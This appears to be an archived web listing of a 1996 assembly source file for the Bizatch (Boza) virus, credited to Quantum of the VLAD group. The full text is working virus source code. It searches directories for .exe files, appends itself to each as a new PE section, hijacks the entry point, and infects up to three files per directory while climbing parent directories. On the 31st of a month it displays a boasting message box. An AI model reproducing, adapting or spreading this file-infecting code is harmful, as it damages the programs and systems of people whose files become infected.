HPAVC

home *** CD-ROM | disk | FTP | other *** search

/ HPAVC / HPAVC CD-ROM.iso / pc / WINVCOLL.ZIP / WINMADEF.ZIP / BIZATCH.ZIP / BOZA.ASM < prev next >

Wrap

Assembly Source File | 1996-02-11 | 7.6 KB | 428 lines

;Here is the beta of Bizatch (the actual virus code) that AV authors ;around the world are calling "Boza". ; ;----------------------------------------------------------------------------- vladseg segment para public 'vlad' assume cs:vladseg vstart: call recalc recalc: pop ebp mov eax,ebp db 2dh subme dd 30000h + (recalc - vstart) push eax sub ebp,offset recalc mov eax,[ebp + offset kern2] cmp dword ptr [eax],5350fc9ch jnz notkern2 mov eax,[ebp + offset kern2] jmp movit notkern2: mov eax,[ebp + offset kern1] cmp dword ptr [eax],5350fc9ch jnz nopayload mov eax,[ebp + offset kern1] movit: mov [ebp + offset kern],eax cld lea eax,[ebp + offset orgdir] push eax push 255 call GetCurDir mov byte ptr [ebp + offset countinfect],0 infectdir: lea eax,[ebp + offset win32_data_thang] push eax lea eax,[ebp + offset fname] push eax call FindFile mov dword ptr [ebp + offset searchhandle],eax cmp eax,-1 jz foundnothing gofile: push 0 push dword ptr [ebp + offset fileattr] push 3 push 0 push 0 push 80000000h + 40000000h lea eax,[ebp + offset fullname] push eax call CreateFile mov dword ptr [ebp + offset ahand],eax cmp eax,-1 jz findnextone push 0 push 0 push 3ch push dword ptr [ebp + offset ahand] call SetFilePointer push 0 lea eax,[ebp + offset bytesread] push eax push 4 lea eax,[ebp + offset peheaderoffset] push eax push dword ptr [ebp + offset ahand] call ReadFile push 0 push 0 push dword ptr [ebp + offset peheaderoffset] push dword ptr [ebp + offset ahand] call SetFilePointer push 0 lea eax,[ebp + offset bytesread] push eax push 58h lea eax,[ebp + offset peheader] push eax push dword ptr [ebp + offset ahand] call ReadFile cmp word ptr [ebp + offset peheader],'EP' jnz notape cmp word ptr [ebp + offset peheader + 4ch],0F00Dh jz notape push 0 push 0 push dword ptr [ebp + offset peheaderoffset] push dword ptr [ebp + offset ahand] call SetFilePointer push 0 lea eax,[ebp + offset bytesread] push eax push dword ptr [ebp + offset headersize] lea eax,[ebp + offset peheader] push eax push dword ptr [ebp + offset ahand] call ReadFile mov word ptr [ebp + offset peheader + 4ch],0F00Dh xor eax,eax mov ax, word ptr [ebp + offset NtHeaderSize] add eax,18h mov dword ptr [ebp + offset ObjectTableoffset],eax mov esi,dword ptr [ebp + offset ObjectTableoffset] lea eax,[ebp + offset peheader] add esi,eax xor eax,eax mov ax,[ebp + offset numObj] mov ecx,40 xor edx,edx mul ecx add esi,eax inc word ptr [ebp + offset numObj] ; inc the number of objects lea edi,[ebp + offset newobject] xchg edi,esi mov eax,[edi-5*8+8] add eax,[edi-5*8+12] mov ecx,dword ptr [ebp + offset objalign] xor edx,edx div ecx inc eax mul ecx mov dword ptr [ebp + offset RVA],eax mov ecx,dword ptr [ebp + offset filealign] mov eax,vend-vstart xor edx,edx div ecx inc eax mul ecx mov dword ptr [ebp + offset physicalsize],eax mov ecx,dword ptr [ebp + offset objalign] mov eax,vend - vstart + 1000h xor edx,edx div ecx inc eax mul ecx mov dword ptr [ebp + offset virtualsize],eax mov eax,[edi-5*8+20] add eax,[edi-5*8+16] mov ecx,dword ptr [ebp + offset filealign] xor edx,edx div ecx inc eax mul ecx mov dword ptr [ebp + offset physicaloffset],eax mov eax,vend-vstart+1000h add eax,dword ptr [ebp + offset imagesize] mov ecx,[ebp + offset objalign] xor edx,edx div ecx inc eax mul ecx mov dword ptr [ebp + offset imagesize],eax mov ecx,10 rep movsd mov eax,dword ptr [ebp + offset RVA] mov ebx,dword ptr [ebp + offset entrypointRVA] mov dword ptr [ebp + offset entrypointRVA],eax sub eax,ebx add eax,5 mov dword ptr [ebp + offset subme],eax push 0 push 0 push dword ptr [ebp + offset peheaderoffset] push dword ptr [ebp + offset ahand] call SetFilePointer push 0 lea eax,[ebp + offset bytesread] push eax push dword ptr [ebp + offset headersize] lea eax,[ebp + offset peheader] push eax push dword ptr [ebp + offset ahand] call WriteFile inc byte ptr [ebp + offset countinfect] push 0 push 0 push dword ptr [ebp + offset physicaloffset] push dword ptr [ebp + offset ahand] call SetFilePointer push 0 lea eax,[ebp + offset bytesread] push eax push vend-vstart lea eax,[ebp + offset vstart] push eax push dword ptr [ebp + offset ahand] call WriteFile notape: push dword ptr [ebp + offset ahand] call CloseFile findnextone: cmp byte ptr [ebp + offset countinfect],3 jz outty lea eax,[ebp + offset win32_data_thang] push eax push dword ptr [ebp + offset searchhandle] call FindNext or eax,eax jnz gofile foundnothing: xor eax,eax lea edi,[ebp + offset tempdir] mov ecx,256/4 rep stosd lea edi,[ebp + offset tempdir1] mov ecx,256/4 rep stosd lea esi,[ebp + offset tempdir] push esi push 255 call GetCurDir lea eax,[ebp + offset dotdot] push eax call SetCurDir lea edi,[ebp + offset tempdir1] push edi push 255 call GetCurDir mov ecx,256/4 rep cmpsd jnz infectdir outty: lea eax,[ebp + offset orgdir] push eax call SetCurDir lea eax,[ebp + offset systimestruct] push eax call GetTime cmp word ptr [ebp + offset day],31 jnz nopayload push 1000h lea eax,[ebp + offset boxtitle] push eax lea eax,[ebp + offset boxmsg] push eax push 0 call MsgBox nopayload: pop eax jmp eax kern dd 0BFF93B95h kern1 dd 0BFF93B95h kern2 dd 0BFF93C1Dh GetCurDir: push 0BFF77744h jmp [ebp + offset kern] SetCurDir: push 0BFF7771Dh jmp [ebp + offset kern] GetTime: cmp [ebp + offset kern],0BFF93B95h jnz gettimekern2 push 0BFF9D0B6h jmp [ebp + offset kern] gettimekern2: push 0BFF9D14eh jmp [ebp + offset kern] MsgBox: push 0BFF638D9h jmp [ebp + offset kern] FindFile: push 0BFF77893h jmp [ebp + offset kern] FindNext: push 0BFF778CBh jmp [ebp + offset kern] CreateFile: push 0BFF77817h jmp [ebp + offset kern] SetFilePointer: push 0BFF76FA0h jmp [ebp + offset kern] ReadFile: push 0BFF75806h jmp [ebp + offset kern] WriteFile: push 0BFF7580Dh jmp [ebp + offset kern] CloseFile: push 0BFF7BC72h jmp [ebp + offset kern] countinfect db 0 win32_data_thang: fileattr dd 0 createtime dd 0,0 lastaccesstime dd 0,0 lastwritetime dd 0,0 filesize dd 0,0 resv dd 0,0 fullname db 256 dup (0) realname db 14 dup (0) boxtitle db "Bizatch by Quantum / VLAD",0 boxmsg db "The taste of fame just got tastier!",0dh db "VLAD Australia does it again with the world's first Win95 Virus" db 0dh,0dh db 9,"From the old school to the new.. ",0dh,0dh db 9,"Metabolis",0dh db 9,"Qark",0dh db 9,"Darkman",0dh db 9,"Automag",0dh db 9,"Antigen",0dh db 9,"RhinceWind",0dh db 9,"Quantum",0dh db 9,"Absolute Overlord",0dh db 9,"CoKe",0 message db "Please note: the name of this virus is [Bizatch]" db " written by Quantum of VLAD",0 orgdir db 256 dup (0) tempdir db 256 dup (0) tempdir1 db 256 dup (0) dotdot db "..",0 systimestruct: dw 0,0,0 day dw 0 dw 0,0,0,0 searchhandle dd 0 fname db '*.exe',0 ahand dd 0 peheaderoffset dd 0 ObjectTableoffset dd 0 bytesread dd 0 newobject: oname db ".vlad",0,0,0 virtualsize dd 0 RVA dd 0 physicalsize dd 0 physicaloffset dd 0 reserved dd 0,0,0 objectflags db 40h,0,0,0c0h peheader: signature dd 0 cputype dw 0 numObj dw 0 db 3*4 dup (0) NtHeaderSize dw 0 Flags dw 0 db 4*4 dup (0) entrypointRVA dd 0 db 3*4 dup (0) objalign dd 0 filealign dd 0 db 4*4 dup (0) imagesize dd 0 headersize dd 0 vend: db 1000h dup (0) ends end vstart ;------------------------------------------------------------------------------